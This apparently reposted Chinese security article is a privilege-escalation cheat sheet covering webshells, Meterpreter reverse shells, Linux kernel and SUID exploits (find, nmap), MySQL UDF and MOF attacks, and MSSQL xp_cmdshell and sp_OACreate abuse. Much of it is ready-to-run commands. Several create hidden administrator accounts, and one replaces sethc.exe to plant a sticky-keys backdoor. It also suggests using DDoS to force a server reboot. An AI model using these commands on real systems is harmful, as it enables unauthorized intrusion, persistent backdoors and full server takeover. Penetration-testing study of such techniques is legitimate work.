百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术文章 > 正文

干货|当前...把握这个提权思路(必备)

cac55 2024-10-13 01:23 59 浏览 0 评论

欢迎搜索公众号:白帽子左一

每天分享更多黑客技能,工具及体系化视频教程(免费领)

提权


Webshell:尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞(系统漏洞,服务器漏洞,第三方软件漏洞,数据库漏洞)来获取shell。


反弹shell:利用kali虚拟机msfvenom编写反弹shell脚本

被控制端发起的shell---通常用于被控制因防火墙受限,权限不足、端口被占用


开启监听:msfconsole模块监听响应的反弹shell脚本(当靶机点击脚本的时候),进入meterpreter模块,可以getsystem权限,获取信息等等,还可以开启远程服务功能(lcx,scocks5)


Windows


系统溢出漏洞提权---windows(可执行文件:一种是.com;另一种.exe)

#系统溢出漏洞操作说明

1、明确漏洞编号及版本

2、明确漏洞利用平台及版本

3、确保cmd执行权限正常运行

4、确保服务器相关防护软件情况


#查看系统补丁,提权前期准备【前提已获取webshell】


方法一:输入shell进入到该主机的shell下,然后:systeminfo 查看系统详细信息


方法二:

进入到 meterpreter 下

执行 run post/windows/gather/enum_patches 可直接查看补丁情况


方法三:

post/multi/recon/local_exploit_suggester 模块,用于快速识别系统中可能被利用的漏洞

方法四:WMIC命令也可以查看补丁数量

wmic qfe get Caption,Description,HotFixID,InstalledOn

也可以直接找是否存在某个cve-2018-8120对应的KB4131188补丁

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB4131188"

方法五:Windows Exploit Suggester

该工具可以将系统中已经安装的补丁程序与微软的漏洞数据库进行比较,并可以识别可能导致权限提升的漏洞,而其只需要目标系统的信息。

通过msf生成反弹exe进行反弹操作,获取meterpreter通道

监听获取成功后,进行exp的筛选

探测可提取的模块use post/multi/recon/local_exploit_suggester


linux


#基础信息收集

uname -a 显示全部系统信息

cat /etc/issue 内核信息。此命令也适用于所有的Linux发行版

cat /etc/passwd 所有人都可看

ps aux | grep root


(1)#内核漏洞提权

方法:

通过信息收集方式得知linux内核版本

使用searchspolit搜索相应版本漏洞

例:searchsploit linux 4.0.0

searchsploit Ubuntu 16.04

searchsploit Ubuntu 16 kernel 3.10

找到对应的.c源文件,将其发送到靶机/或是靶机下载 scp、

wget http://127.0.0.1/xx.c编译、gcc xxx.c -o exp


(2)#SUID提权

概念

SUID(设置用户ID)是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。


特点

SUID 权限仅对二进制程序有效

执行者对于该程序需要有可执行权限(x权限)

SUID 权限仅仅在程序执行过程中有效

执行该程序时,执行者将具有该程序拥有者的权限

首先在本地查找符合条件的文件,有以下三个命令

列出来的所有文件都是以root用户权限来执行的,接下来找到可以提权的文件

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

常用的可用于suid提权的文件

Nmap、Vim、find、Bash、More、Less、cp

(3)#nmap提权

较旧版本的Nmap(2.02至5.21)带有交互模式,从而允许用户执行shell命令。

因此可以使用交互式控制台来运行具有相同权限的shell。

方法一:

启动交互模式,使用nmap --interactive

!sh #执行之后将提供一个提权后的shell。


方法二:

Metasploit模块,也可以通过SUID Nmap二进制文件进行提权。

exploit/unix/local/setuid_nmap


(4)#find提权

实用程序find用来在系统中查找文件。同时,它也有执行命令的能力。

因此,如果配置为使用SUID权限运行,则可以通过find执行的命令都将以root身份去运行。


(5)#sudo提权

sudo命令以系统管理者的身份执行指令,也就是说,经由 sudo 所执行的指令就好像是 root 亲自执行。

sudo 表示 “superuser do”。它允许已验证的用户以其他用户的身份来运行命令。

其他用户可以是普通用户或者超级用户。

然而,大部分时候我们用它来以提升的权限来运行命令。


数据库


获取网站数据库的账号和密码

--通过读取一些数据库配置文件

数据库配置文件:命令规则(data、sql、inc、config、conn、database等)

--通过mysql数据库的user表

数据库安装文件:安装目录下data/mysql/user.myd

frm:描述表结构文件,字段长度


myi:索引信息


myd:数据库信息文件,存储数据信息


提权原理

已知root账号和密码,利用root权限,创建带有调用cmd函数的“udf.dll”。

当我们把udf.dll导出指定文件夹引入mysql时候,其中的调用函数拿出来当作mysql函数来使用

注意事项

mysql版本小于5.1版本,

udf.dll文件在windows2003下放在:c:\windows\system32。

在windows2000放在:c:\winnt\system32

mysql版本大于5.1版本,udf.dll文件必须放置在mysql安装目录下的lib\plugin。

但是大于5.1版本的时候没有plugin这个文件夹,需要自己创建。

利用udf文件加载函数执行命令

create function cmdshell returns string soname 'udf.dll';  //returns string soname ‘导出的DLL路径’;
select cmdshell('net user ndsec ndsecpw /add');
select cmdshell('net localgroup administrators ndsec /add');
drop function cmdshell;


(2)#数据库提权——mof提权

mof文件:mof文件是mysql数据库的扩展文件

存放路径(C:/windows/system32/wbem/mof/nullevt.mof)

其作用是每隔5秒就会去监控进程创建和死亡。


提权条件

1、windows2003及以下

2、mysql启动身份具有权限去读写C:/windows/system32/wbem/mof/目录

3、secure-file-priv=不为null

提权原理

mof文件每5秒就会执行,而且是系统权限,我们可以通过load_file将文件写入/wbme/mof,然后系统每5秒就会执行一次我们上传的mof

mof当中是一段vbs脚本,通过通过控制vbs脚本让系统执行命令,进行提权。


(3)#数据库提权——反弹端口提权

提权条件

1、获取数据库的账号和密码,同时能够执行查询命令。

2、secure_file_priv=,可导出udf.dll到系统目录或者mysql数据库安装目录下的lib下plugin

3、授权mysql数据库远程用户的登录


(4)#数据库提权——启动项提权 (这种方法不推荐)

提权原理

使用mysql写文件,写一段vbs代码到开启自启动中。

服务器重启的时候达到创建用户并提取。

可以使用DDOS迫使服务器重启


提权条件

secure_file_priv不为null

已知账号和密码


(5)#linux系统-udf提权

上传脚本进行监听

靶机连接数据库

查看版本

use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select do_system('chmod u+s /usr/bin/find');
find / -exec "/bin/sh" \;


#mssql数据库



SA权限

执行命令存储过程:xp_cmshell、sp_OACreate

注册表存储过程:xp_regwrite

#存储过程

其实质就是一个“集体”。它就是存储在sqlserver中预先定义好的“sql语句集体。”

使用T-SQL语言编写好的各种小脚本共同组合成的集体,我们就称为“存储过程”


#利用xp_cmdshell提权

(1)xp_cmdshell解释

Xp_cmdshell是sqlserver中的组件,可以以操作系统命令解释器的方式执行给定的命令字符串,并以文本行方式返回任何输出。可以用来执行系统命令

(2)xp_cmdshell开启

默认在sql server2000中是开启的,在sqlserver2005之后的版本默认禁止。


如果我们有sa权限,可以用命令开启

exec sp_configure ‘show advanced options’ , 1;reconfigure;
exec sp_configure ‘xp_cmdshell’, 1;reconfigure;
xp_cmdshell 关闭
exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'ole automation procedures',0;reconfigure;
exec sp_configure 'show advanced options',0;reconfigure;


(3)当xp_cmdshell删除或出错的情况下,使用sp_OACreate组件

开启组件SP_OACreate

exec sp_configure 'show advanced options',1;reconfigure;


exec sp_configure 'ole automation procedures',1;reconfigure;

关闭组件SP_OACreate

exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'ole automation procedures',0;reconfigure;
exec sp_configure 'show advanced options',0;reconfigure;


利用SP_OACreate添加用户提权

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user quan 123456 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators quan /add'

利用SP_OACreate的其他操作

#sp_OACreate替换粘贴键
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
execsp_oamethod@o,'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
execsp_oamethod@o,'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';


(4)使用注册表存储过程:xp_regwrite

转自:https://www.freebuf.com/articles/web/265001.html

相关推荐

Mac电脑强制删除任何软件方法-含自启动应用

对于打工者来说,进入企业上班使用的电脑大概率是会被监控起来,比如各种流行的数据防泄漏DLP,奇安信天擎,甚至360安全卫士,这些安全软件你想卸载是非常困难的,甚至卸载后它自己又安装回来了,并且还在你不...

Linux基础知识 | 文件与目录大全讲解

1.linux文件权限与目录配置1.文件属性Linux一般将文件可存取的身份分为三个类别,分别是owner/group/others,且三种身份各read/write/execute等权限文...

文件保护不妥协:2025 年 10 款顶级加密工具推荐

数据安全无小事,2025年这10款加密工具凭借独特功能脱颖而出,从个人到企业场景全覆盖,第一款为Ping32,其余为国外英文软件。1.Ping32企业级加密核心工具,支持200+文件格...

省心省力 一个软件搞定系统维护_省心安装在哪里能找到

◆系统类似于我们居住的房间,需要经常打理才能保持清洁、高效。虽然它本身也自带一些清理和优化的工具,但借助于好用的第三方工具来执行这方面的任务,会更让人省心省力。下面笔者就为大家介绍一款集多项功能于一身...

JAVA程序员常用的几个工具类_java程序员一般用什么软件写程序

好的工具做起事来常常事半功倍,下面介绍几个开发中常用到的工具类,收藏一下,也许后面真的会用到。字符串处理:org.apache.commons.lang.StringUtilsisBlank(Char...

手工解决Windows10的若干难题_windows10系统卡顿怎么解决

【电脑报在线】很多朋友已经开始使用Win10,估计还只是测试版本的原因,使用过程中难免会出现一些问题,这里介绍解决一些解决难题的技巧。技巧1:让ProjectSpartan“重归正途”从10074...

System32文件夹千万不能删除,看完这篇你就知道为什么了

C:\Windows\System32目录是Windows操作系统的关键部分,重要的系统文件存储在该目录中。网上的一些恶作剧者可能会告诉你删除它,但你不应该尝试去操作,如果你尝试的话,我们会告诉你会发...

Windows.old 文件夹:系统备份的解析与安全删除指南

Windows.old是Windows系统升级(如Win10升Win11)或重装时,系统自动在C盘创建的备份文件夹,其核心作用是保留旧系统的文件、程序与配置,为“回退旧系统”提供保...

遇到疑难杂症?Windows 10回收站问题巧解决

回收站是Windows10的一个重要组件。然而,我们在使用过程中,可能会遇到一些问题。例如,不论回收站里有没有文件,都显示同一个图标,让人无法判别回收站的空和满的真实情况;没有了像Windows7...

卸载软件怎么彻底删掉?简单几个步骤彻底卸载,电脑小白看过来

日常工作学习生活中,我们需要在安装一些软件程序,但随着软件的更新迭代速度,很多时候我们需要重新下载安装新的程序,这时就需要将旧的一些软件程序进行卸载。但是卸载软件虽然很简单,但是很多小伙伴们表示卸载不...

用不上就删!如何完全卸载OneDrive?

作为Windows10自带的云盘,OneDrive为资料的自动备份和同步提供了方便。然而,从隐私或其他方面考虑,有些人不愿意使用OneDrive。但Windows10本身不提供直接卸载OneDri...

【Linux知识】Linux下快速删除大量文件/文件夹方法

在Linux下,如果需要快速删除大量文件或文件夹,可以使用如下方法:使用rm命令删除文件:可以使用rm命令删除文件,例如:rm-rf/path/to/directory/*这个命令会递...

清理系统不用第三方工具_清理系统垃圾用什么软件

清理优化系统一定要借助于优化工具吗?其实,手动优化系统也没有那么神秘,掌握了方法和技巧,系统清理也是一件简单和随心的事。一方面要为每一个可能产生累赘的文件找到清理的方法,另一方面要寻找能够提高工作效率...

系统小技巧:软件卸载不了?这里办法多

在正常情况下,我们都是通过软件程序组中的卸载图标,或利用控制面板中的“程序和功能”模块来卸载软件的。但有时,我们也会发现利用卸载图标无法卸载软件或者卸载图标干脆丢失找不到了,甚至控制面板中卸载软件的功...

麒麟系统无法删除文件夹_麒麟系统删除文件权限不够

删除文件夹方法例:sudorm-rf文件夹名称。删除文件方法例:sudorm-r文件名包括扩展名。如果没有权限,给文件夹加一下权限再删。加最高权限chmod775文件名加可执行权限...

取消回复欢迎 发表评论: